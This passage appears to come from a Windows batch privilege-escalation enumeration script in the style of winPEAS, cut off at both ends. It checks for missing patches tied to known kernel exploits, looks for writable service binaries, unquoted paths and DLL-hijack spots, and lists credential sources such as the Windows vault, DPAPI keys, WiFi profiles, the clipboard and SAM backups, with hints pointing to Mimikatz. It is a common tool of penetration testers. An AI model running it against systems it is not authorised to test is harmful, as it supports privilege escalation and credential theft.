(Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched) 60 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB981957" 1>NUL 61 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout) 62 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB4013081" 1>NUL 63 | IF "%expl%" == "yes" IF errorlevel 1 echo MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading) 64 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB977165" 1>NUL 65 | IF "%expl%" == "yes" IF errorlevel 1 echo MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring) 66 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB941693" 1>NUL 67 | IF "%expl%" == "yes" IF errorlevel 1 echo MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys) 68 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB920958" 1>NUL 69 | IF "%expl%" == "yes" IF errorlevel 1 echo MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo) 70 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB914389" 1>NUL 71 | IF "%expl%" == "yes" IF errorlevel 1 echo MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys) 72 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB908523" 1>NUL 73 | IF "%expl%" == "yes" IF errorlevel 1 echo MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free) 74 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB890859" 1>NUL 75 | IF "%expl%" == "yes" IF errorlevel 1 echo MS05-018 patch is NOT installed! 
(Vulns: 2K/SP3/4,XP/SP1/2-CSRSS) 76 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB842526" 1>NUL 77 | IF "%expl%" == "yes" IF errorlevel 1 echo MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager) 78 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB835732" 1>NUL 79 | IF "%expl%" == "yes" IF errorlevel 1 echo MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF) 80 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB841872" 1>NUL 81 | IF "%expl%" == "yes" IF errorlevel 1 echo MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX) 82 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2975684" 1>NUL 83 | IF "%expl%" == "yes" IF errorlevel 1 echo MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer) 84 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3136041" 1>NUL 85 | IF "%expl%" == "yes" IF errorlevel 1 echo MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address) 86 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB3057191" 1>NUL 87 | IF "%expl%" == "yes" IF errorlevel 1 echo MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys) 88 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2989935" 1>NUL 89 | IF "%expl%" == "yes" IF errorlevel 1 echo MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP) 90 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2778930" 1>NUL 91 | IF "%expl%" == "yes" IF errorlevel 1 echo MS13-005 patch is NOT installed! 
(Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast) 92 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2850851" 1>NUL 93 | IF "%expl%" == "yes" IF errorlevel 1 echo MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei) 94 | IF "%expl%" == "yes" wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2870008" 1>NUL 95 | IF "%expl%" == "yes" IF errorlevel 1 echo MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu) 96 | echo. 97 | echo. 98 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] DATE and TIME ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 99 | echo [i] You may need to adjust your local date/time to exploit some vulnerability 100 | date /T 101 | time /T 102 | echo. 103 | echo. 104 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Audit Settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 105 | echo [i] Check what is being logged 106 | REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 107 | echo. 108 | echo. 109 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WEF Settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 110 | echo [i] Check where are being sent the logs 111 | REG QUERY HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 112 | echo. 113 | echo. 114 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] LAPS installed? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 115 | echo [i] Check what is being logged 116 | REG QUERY "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled 117 | echo. 118 | echo. 119 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] LSA protection? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 120 | echo [i] Active if "1" 121 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v RunAsPPL 122 | echo. 123 | echo. 124 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Credential Guard? 
^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 125 | echo [i] Active if "1" or "2" 126 | REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA" /v LsaCfgFlags 127 | echo. 128 | echo. 129 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WDigest? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 130 | echo [i] Plain-text creds in memory if "1" 131 | reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential 132 | echo. 133 | echo. 134 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Number of cached creds ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 135 | echo [i] You need System to extract them 136 | reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CACHEDLOGONSCOUNT 137 | echo. 138 | echo. 139 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] UAC Settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 140 | echo [i] If the results read ENABLELUA REG_DWORD 0x1, part or all of the UAC components are on 141 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access 142 | REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA 143 | echo. 144 | echo. 145 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Registered Anti-Virus(AV) ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 146 | WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List | more 147 | echo. 148 | echo. 149 | echo Checking for defender whitelisted PATHS 150 | reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" 151 | echo. 152 | echo. 
153 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] PS settings ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 154 | echo PowerShell v2 Version: 155 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine /v PowerShellVersion 156 | echo PowerShell v5 Version: 157 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine /v PowerShellVersion 158 | echo Transcriptions Settings: 159 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription 160 | echo Module logging settings: 161 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging 162 | echo Scriptblog logging settings: 163 | REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging 164 | echo. 165 | echo PS default transcript history 166 | dir %SystemDrive%\transcripts\ 167 | echo. 168 | echo Checking PS history file 169 | dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 170 | echo. 171 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] MOUNTED DISKS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 172 | echo [i] Maybe you find something interesting 173 | (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul) 174 | echo. 175 | echo. 176 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] ENVIRONMENT ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 177 | echo [i] Interesting information? 178 | set 179 | echo. 180 | echo. 181 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] INSTALLED SOFTWARE ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 182 | echo [i] Some weird software? Check for vulnerabilities in unknow software installed 183 | echo [?] 
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#software 184 | dir /b "C:\Program Files" "C:\Program Files (x86)" | sort 185 | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s | findstr InstallLocation | findstr ":\\" 186 | reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ /s | findstr InstallLocation | findstr ":\\" 187 | IF exist C:\Windows\CCM\SCClient.exe echo SCCM is installed (installers are run with SYSTEM privileges, many are vulnerable to DLL Sideloading) 188 | echo. 189 | echo. 190 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Remote Desktop Credentials Manager ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 191 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager 192 | IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" echo Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files 193 | echo. 194 | echo. 195 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WSUS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 196 | echo [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) 197 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus 198 | reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\ 2>nul | findstr /i "wuserver" | findstr /i "http://" 199 | echo. 200 | echo. 201 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] RUNNING PROCESSES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 202 | echo [i] Something unexpected is running? Check for vulnerabilities 203 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#running-processes 204 | tasklist /SVC 205 | echo. 
206 | echo [i] Checking file permissions of running processes (File backdooring - maybe the same files start automatically when Administrator logs in) 207 | for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do ( 208 | for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do ( 209 | icacls "%%z" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. 210 | ) 211 | ) 212 | echo. 213 | echo [i] Checking directory permissions of running processes (DLL injection) 214 | for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do ( 215 | icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. 216 | ) 217 | echo. 218 | echo. 219 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] RUN ^AT STARTUP ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 220 | echo [i] Check if you can modify any binary that is going to be executed by admin or if you can impersonate a not found binary 221 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#run-at-startup 222 | ::(autorunsc.exe -m -nobanner -a * -ct /accepteula 2>nul || wmic startup get caption,command 2>nul | more & ^ 223 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ 224 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ 225 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2>nul & ^ 226 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 2>nul & ^ 227 | icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. 
& ^ 228 | icacls "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 229 | icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 230 | icacls "C:\Documents and Settings\%username%\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 231 | icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 232 | icacls "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 233 | icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 234 | icacls "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. & ^ 235 | schtasks /query /fo TABLE /nh | findstr /v /i "disable deshab informa") 236 | echo. 237 | echo. 238 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] AlwaysInstallElevated? ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 239 | echo [i] If '1' then you can install a .msi file with admin privileges ;) 240 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated 241 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul 242 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2> nul 243 | echo. 244 | echo. 245 | echo. 
246 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] NETWORK ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 247 | echo. 248 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CURRENT SHARES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 249 | net share 250 | echo. 251 | echo. 252 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] INTERFACES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 253 | ipconfig /all 254 | echo. 255 | echo. 256 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] USED PORTS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 257 | echo [i] Check for services restricted from the outside 258 | netstat -ano | findstr /i listen 259 | echo. 260 | echo. 261 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] FIREWALL ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 262 | netsh firewall show state 263 | netsh firewall show config 264 | echo. 265 | echo. 266 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] ^ARP ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 267 | arp -A 268 | echo. 269 | echo. 270 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] ROUTES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 271 | route print 272 | echo. 273 | echo. 274 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Hosts file ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 275 | type C:\WINDOWS\System32\drivers\etc\hosts | findstr /v "^#" 276 | echo. 277 | echo. 278 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CACHE DNS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 279 | ipconfig /displaydns | findstr "Record" | findstr "Name Host" 280 | echo. 281 | echo. 282 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WIFI ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 283 | echo [i] To get the clear-text password use: netsh wlan show profile key=clear 284 | netsh wlan show profile 285 | echo. 286 | echo. 287 | echo. 
288 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^>[*] BASIC USER INFO ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 289 | echo [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege 290 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#users-and-groups 291 | echo. 292 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CURRENT USER ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 293 | net user %username% 294 | net user %USERNAME% /domain 2>nul 295 | whoami /all 296 | echo. 297 | echo. 298 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] USERS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 299 | net user 300 | echo. 301 | echo. 302 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] GROUPS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 303 | net localgroup 304 | echo. 305 | echo. 306 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] ADMINISTRATORS GROUPS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 307 | net localgroup Administrators 2>nul 308 | net localgroup Administradores 2>nul 309 | echo. 310 | echo. 311 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CURRENT LOGGED USERS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 312 | quser 313 | echo. 314 | echo. 315 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Kerberos Tickets ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 316 | klist 317 | echo. 318 | echo. 319 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CURRENT CLIPBOARD ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 320 | echo [i] Any password inside the clipboard? 321 | powershell -command "Get-Clipboard" 2>nul 322 | echo. 323 | echo. 324 | echo. 325 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] SERVICES VULNERABILITIES ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 326 | ::echo. 
327 | ::echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SERVICE PERMISSIONS WITH accesschk.exe FOR 'Authenticated users', Everyone, BUILTIN\Users, Todos and CURRENT USER ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 328 | ::echo [i] If Authenticated Users have SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG or WRITE_DAC or WRITE_OWNER or GENERIC_WRITE or GENERIC_ALL, you can modify the binary that is going to be executed by the service and start/stop the service 329 | ::echo [i] If accesschk.exe is not in PATH, nothing will be found here 330 | ::echo [I] AUTHETICATED USERS 331 | ::accesschk.exe -uwcqv "Authenticated Users" * /accepteula 2>nul 332 | ::echo [I] EVERYONE 333 | ::accesschk.exe -uwcqv "Everyone" * /accepteula 2>nul 334 | ::echo [I] BUILTIN\Users 335 | ::accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul 336 | ::echo [I] TODOS 337 | ::accesschk.exe -uwcqv "Todos" * /accepteula 2>nul 338 | ::echo [I] %USERNAME% 339 | ::accesschk.exe -uwcqv %username% * /accepteula 2>nul 340 | ::echo. 341 | ::echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SERVICE PERMISSIONS WITH accesschk.exe FOR * ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 342 | ::echo [i] Check for weird service permissions for unexpected groups" 343 | ::accesschk.exe -uwcqv * /accepteula 2>nul 344 | 345 | echo. 346 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SERVICE BINARY PERMISSIONS WITH WMIC + ICACLS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 347 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services 348 | for /f "tokens=2 delims='='" %%a in ('cmd.exe /c wmic service list full ^| findstr /i "pathname" ^|findstr /i /v "system32"') do ( 349 | for /f eol^=^"^ delims^=^" %%b in ("%%a") do icacls "%%b" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos usuarios %username%" && echo. 350 | ) 351 | echo. 352 | echo. 353 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 354 | echo [?] 
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services 355 | for /f %%a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv >nul 2>&1 & reg save %%a %temp%\reg.hiv >nul 2>&1 && reg restore %%a %temp%\reg.hiv >nul 2>&1 && echo You can modify %%a 356 | echo. 357 | echo. 358 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] UNQUOTED SERVICE PATHS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 359 | echo [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' 360 | echo [i] The permissions are also checked and filtered using icacls 361 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services 362 | for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( 363 | for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do ( 364 | echo %%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo. 365 | ) 366 | ) 367 | ::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """ 368 | echo. 369 | echo. 370 | echo. 371 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] DLL HIJACKING in PATHenv variable ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 372 | echo [i] Maybe you can take advantage of modifying/creating some binary in some of the following locations 373 | echo [i] PATH variable entries permissions - place binary or DLL to execute instead of legitimate 374 | echo [?] 
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dll-hijacking 375 | for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. ) 376 | echo. 377 | echo. 378 | echo. 379 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [*] CREDENTIALS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 380 | echo. 381 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WINDOWS VAULT ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 382 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#windows-vault 383 | cmdkey /list 384 | echo. 385 | echo. 386 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] DPAPI MASTER KEYS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 387 | echo [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt 388 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi 389 | powershell -command "Get-ChildItem %appdata%\Microsoft\Protect" 2>nul 390 | powershell -command "Get-ChildItem %localappdata%\Microsoft\Protect" 2>nul 391 | echo. 392 | echo. 393 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] DPAPI MASTER KEYS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 394 | echo [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt 395 | echo [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module 396 | echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi 397 | echo Looking inside %appdata%\Microsoft\Credentials\ 398 | dir /b/a %appdata%\Microsoft\Credentials\ 2>nul 399 | echo Looking inside %localappdata%\Microsoft\Credentials\ 400 | dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul 401 | echo. 402 | echo. 403 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] Unattended files ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 404 | IF EXIST %WINDIR%\sysprep\sysprep.xml ECHO %WINDIR%\sysprep\sysprep.xml exists. 
405 | IF EXIST %WINDIR%\sysprep\sysprep.inf ECHO %WINDIR%\sysprep\sysprep.inf exists. 406 | IF EXIST %WINDIR%\sysprep.inf ECHO %WINDIR%\sysprep.inf exists. 407 | IF EXIST %WINDIR%\Panther\Unattended.xml ECHO %WINDIR%\Panther\Unattended.xml exists. 408 | IF EXIST %WINDIR%\Panther\Unattend.xml ECHO %WINDIR%\Panther\Unattend.xml exists. 409 | IF EXIST %WINDIR%\Panther\Unattend\Unattend.xml ECHO %WINDIR%\Panther\Unattend\Unattend.xml exists. 410 | IF EXIST %WINDIR%\Panther\Unattend\Unattended.xml ECHO %WINDIR%\Panther\Unattend\Unattended.xml exists. 411 | IF EXIST %WINDIR%\System32\Sysprep\unattend.xml ECHO %WINDIR%\System32\Sysprep\unattend.xml exists. 412 | IF EXIST %WINDIR%\System32\Sysprep\unattended.xml ECHO %WINDIR%\System32\Sysprep\unattended.xml exists. 413 | IF EXIST %WINDIR%\..\unattend.txt ECHO %WINDIR%\..\unattend.txt exists. 414 | IF EXIST %WINDIR%\..\unattend.inf ECHO %WINDIR%\..\unattend.inf exists. 415 | echo. 416 | echo. 417 | echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] SAM & SYSTEM backups ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 418 | IF EXIST %WINDIR%\repair\SAM ECHO %WINDIR%\repair\SAM exists. 419 | IF EXIST %WINDIR%\System32\config\RegBack\SAM ECHO %WINDIR%\System32\config\RegBack\SAM exists. 420 | IF EXIST %WINDIR%\System32\config\SAM ECHO %WINDIR%\System32\config\SAM exists. 421 | IF EXIST %WINDIR%\repair\SYSTEM ECHO %WINDIR%\repair\SYSTEM exists. 422 | IF EXIST 